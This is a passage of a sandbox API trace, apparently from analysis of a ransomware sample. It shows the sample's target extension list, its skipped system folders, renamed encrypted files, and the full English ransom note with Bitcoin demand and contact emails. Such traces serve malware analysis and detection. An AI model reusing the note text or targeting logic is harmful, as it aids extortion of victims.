.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".provxml") returned 0x0
	[0173.099] FindNextFileW (in: hFindFile=0xfb9330, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a002fa, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1a002fa, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1a002fa, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x716, dwReserved0=0x310064, dwReserved1=0x7d0039, cFileName="Power_2.provxml", cAlternateFileName="POWER_~3.PRO")) returned 0
	[0173.100] FindClose (in: hFindFile=0xfb9330 | out: hFindFile=0xfb9330) returned 1
	[0173.100] FindClose (in: hFindFile=0xfb9330 | out: hFindFile=0xfb9330) returned 0
	[0173.101] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime"
	[0173.101] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\*.*"
	[0173.101] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0173.101] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0173.101] wsprintfW (in: param_1=0x188950, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT") returned 121
	[0173.102] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0173.107] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0173.107] WriteFile (in: hFile=0x39c, lpBuffer=0x187d08*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x188c2c, lpOverlapped=0x0 | out: lpBuffer=0x187d08*, lpNumberOfBytesWritten=0x188c2c*=0xc46, lpOverlapped=0x0) returned 1
	[0173.110] CloseHandle (hObject=0x39c) returned 1
	[0173.111] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x187cd8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x187cd8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0173.111] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.111] GetUserNameA (in: lpBuffer=0x187bbc, pcbBuffer=0x187cd4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x187cd4) returned 1
	[0173.112] wsprintfW (in: param_1=0x188b58, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0173.113] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0173.113] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0173.113] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0173.113] WriteFile (in: hFile=0x39c, lpBuffer=0x188b58*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x188c34, lpOverlapped=0x0 | out: lpBuffer=0x188b58*, lpNumberOfBytesWritten=0x188c34*=0x30, lpOverlapped=0x0) returned 1
	[0173.113] CloseHandle (hObject=0x39c) returned 1
	[0173.114] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0173.114] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0173.114] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0173.115] wsprintfW (in: param_1=0x188910, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML") returned 122
	[0173.115] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0173.119] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0173.119] WriteFile (in: hFile=0x39c, lpBuffer=0x188104*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x188c28, lpOverlapped=0x0 | out: lpBuffer=0x188104*, lpNumberOfBytesWritten=0x188c28*=0x808, lpOverlapped=0x0) returned 1
	[0173.128] CloseHandle (hObject=0x39c) returned 1
	[0173.128] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.129] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1880ec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1880ec*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0173.129] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.129] GetUserNameA (in: lpBuffer=0x187fd0, pcbBuffer=0x1880e8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1880e8) returned 1
	[0173.130] wsprintfA (in: param_1=0x188b18, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0173.131] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0173.131] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0173.131] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0173.131] WriteFile (in: hFile=0x39c, lpBuffer=0x188b18*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x188c30, lpOverlapped=0x0 | out: lpBuffer=0x188b18*, lpNumberOfBytesWritten=0x188c30*=0x43, lpOverlapped=0x0) returned 1
	[0173.131] CloseHandle (hObject=0x39c) returned 1
	[0173.132] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x80b63ef7, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x310064, dwReserved1=0x7d0039, cFileName=".", cAlternateFileName="")) returned 0xfb92b0
	[0173.132] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\*.*") returned 97
	[0173.132] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.132] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\*.*", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*") returned 0x61
	[0173.133] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.133] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="windows") returned 0x0
	[0173.133] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.133] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="boot") returned 0x0
	[0173.133] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.133] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="system volume information") returned 0x0
	[0173.133] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.134] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0173.134] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.134] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="temp") returned 0x0
	[0173.134] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.135] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="program files") returned 0x0
	[0173.135] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.135] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="program files (x86)") returned 0x0
	[0173.135] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.135] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="appdata") returned 0x0
	[0173.135] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.136] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="application data") returned 0x0
	[0173.136] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.136] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="winnt") returned 0x0
	[0173.136] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.136] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="tmp") returned 0x0
	[0173.136] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.136] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="cache") returned 0x0
	[0173.137] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.137] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="temporary internet files") returned 0x0
	[0173.137] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.137] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="webcache") returned 0x0
	[0173.137] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.137] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="inetcache") returned 0x0
	[0173.137] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.138] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="nvidia") returned 0x0
	[0173.138] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.138] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="packages") returned 0x0
	[0173.138] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.138] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="cookies") returned 0x0
	[0173.138] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.138] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\*.*", lpSrch="programdata") returned 0x0
	[0173.139] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0173.139] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0173.139] FindNextFileW (in: hFindFile=0xfb92b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x80b63ef7, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x310064, dwReserved1=0x7d0039, cFileName="..", cAlternateFileName="")) returned 1
	[0173.139] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0173.139] FindNextFileW (in: hFindFile=0xfb92b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b63ef7, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x80b63ef7, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x80b91518, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x310064, dwReserved1=0x7d0039, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0173.139] FindNextFileW (in: hFindFile=0xfb92b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b3e1a1, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x80b3e1a1, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x80b63ef7, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x310064, dwReserved1=0x7d0039, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0173.139] FindNextFileW (in: hFindFile=0xfb92b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa198dbb0, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa198dbb0, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa19b3e1c, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xfcb, dwReserved0=0x310064, dwReserved1=0x7d0039, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1
	[0173.139] FindNextFileW (in: hFindFile=0xfb92b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa19da08f, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa19da08f, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa19da08f, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xcec, dwReserved0=0x310064, dwReserved1=0x7d0039, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 1
	[0173.139] FindNextFileW (in: hFindFile=0xfb92b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a002fa, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1a002fa, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1a002fa, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x716, dwReserved0=0x310064, dwReserved1=0x7d0039, cFileName="Power_2.provxml", cAlternateFileName="POWER_~3.PRO")) returned 1
	[0173.139] FindNextFileW (in: hFindFile=0xfb92b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a002fa, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1a002fa, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1a002fa, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x716, dwReserved0=0x310064, dwReserved1=0x7d0039, cFileName="Power_2.provxml", cAlternateFileName="POWER_~3.PRO")) returned 0
	[0173.140] FindClose (in: hFindFile=0xfb92b0 | out: hFindFile=0xfb92b0) returned 1
	[0173.140] FindClose (in: hFindFile=0xfb92b0 | out: hFindFile=0xfb92b0) returned 0
	[0173.140] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80aa56d4, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x80aa56d4, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x80acb89b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x230, dwReserved0=0x310064, dwReserved1=0x7d0039, cFileName="runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="RUNTIM~1.SCL")) returned 1
	[0173.140] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80aa56d4, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x80aa56d4, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x80acb89b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x230, dwReserved0=0x310064, dwReserved1=0x7d0039, cFileName="runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="RUNTIM~1.SCL")) returned 0
	[0173.141] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0173.141] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0173.141] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 0
	[0173.141] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0173.141] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0173.142] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{8fb7d64e-70fc-4f9d-89ee-d486817534df}", cAlternateFileName="{8FB7D~1")) returned 1
	[0173.142] lstrcmpW (lpString1="{8fb7d64e-70fc-4f9d-89ee-d486817534df}", lpString2="..") returned 1
	[0173.142] lstrcmpW (lpString1="{8fb7d64e-70fc-4f9d-89ee-d486817534df}", lpString2=".") returned 1
	[0173.142] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning") returned="C:\\Users\\All Users\\Microsoft\\Provisioning"
	[0173.142] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\"
